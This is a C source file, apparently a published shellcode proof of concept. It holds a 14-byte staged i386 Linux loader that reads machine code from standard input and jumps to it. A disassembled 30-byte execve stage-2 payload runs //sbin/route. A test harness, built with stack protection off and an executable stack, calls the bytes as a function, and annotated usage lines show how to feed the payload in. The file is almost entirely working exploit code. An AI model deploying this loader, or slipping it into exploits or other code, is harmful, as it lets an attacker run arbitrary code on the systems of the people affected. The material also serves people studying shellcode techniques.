/*
'''
; Date: 10/03/2019
; Staged-Execve-Route.asm
; Author: Daniele Votta
; Description: This program executes //sbin/route from a staged (reads input from STDIN) shellcode (14 bytes).
; Tested on: i686 GNU/Linux
'''

execve-stack-route: file format elf32-i386
Disassembly of section .text:

08048080 <_start>:
8048080: 31 c0 xor eax,eax
8048082: 50 push eax
8048083: 68 6f 75 74 65 push 0x6574756f
8048088: 68 69 6e 2f 72 push 0x722f6e69
804808d: 68 2f 2f 73 62 push 0x62732f2f
8048092: 89 e3 mov ebx,esp
8048094: 50 push eax
8048095: 89 e2 mov edx,esp
8048097: 53 push ebx
8048098: 89 e1 mov ecx,esp
804809a: b0 0b mov al,0xb
804809c: cd 80 int 0x80
[+] Extract Shellcode ...
"\x31\xc0\x50\x68\x6f\x75\x74\x65\x68\x69\x6e\x2f\x72\x68\x2f\x2f\x73\x62\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
(30 bytes)

======================= POC Daniele Votta =======================
*/

#include<stdio.h>
#include<string.h>

/*
Compile: gcc -fno-stack-protector -z execstack -m32 shellcode.c -o shellcode
How to use: echo -ne "\x31\xc0\x50\x68\x6f\x75\x74\x65\x68\x69\x6e\x2f\x72\x68\x2f\x2f\x73\x62\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"|./shellcode
*/

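/*
 * Stage 1 (14 bytes): read up to 127 (0x7F) bytes from STDIN onto the stack,
 * then continue execution at the bytes that were just read.
 *
 *   6A 7F   push 0x7f
 *   5A      pop  edx        ; count = 127
 *   54      push esp
 *   59      pop  ecx        ; buf = current top of stack
 *   31 DB   xor  ebx,ebx    ; fd = 0 (STDIN)
 *   6A 03   push 0x3
 *   58      pop  eax        ; syscall 3 = read on i386
 *   CD 80   int  0x80
 *   51      push ecx
 *   C3      ret             ; jump to buf
 *
 * Stage 2 is whatever arrives on STDIN; this file's header shows the 30-byte
 * execve of //sbin/route used for that.
 *
 * The \x escapes matter: without them the initializer is plain ASCII text
 * ('x', '6', 'A', ...) and not the 14 machine-code bytes listed above.
 *
 * Stage 1 runs from this data array and stage 2 from the stack, so the
 * technique depends on those mappings being executable; the compile line in
 * this file requests that with -z execstack.
 */
unsigned char code[] =
"\x6A\x7F\x5A\x54\x59\x31\xDB\x6A\x03\x58\xCD\x80\x51\xC3";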

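/*
 * Test harness: prints the length of `code`, then calls the array as if it
 * were a function.
 *
 * Returns 0 if the call ever comes back; per this file's header the bytes
 * end in execve, in which case control does not return here.
 */
int main(void)
{
    /*
     * strlen() takes a char pointer and returns size_t, so cast the unsigned
     * buffer and print with %zu (%d with a size_t argument is a format
     * mismatch). strlen() stops at the first 0x00, so the figure equals the
     * array length only when the bytes contain no NUL.
     */
    printf("Shellcode Length: %zu ", strlen((const char *)code));

    /*
     * The message has no newline and stdout is buffered; flush it now,
     * because pending output is lost if the process image is replaced
     * before a normal exit.
     */
    fflush(stdout);

    /*
     * Converting an object pointer to a function pointer is outside ISO C
     * and only works where the page holding `code` is mapped executable.
     * The compile line in this file asks for that with -z execstack; on a
     * default non-executable-data build this call is expected to fault.
     */
    int (*ret)() = (int(*)())code;
    ret();

    return 0;
}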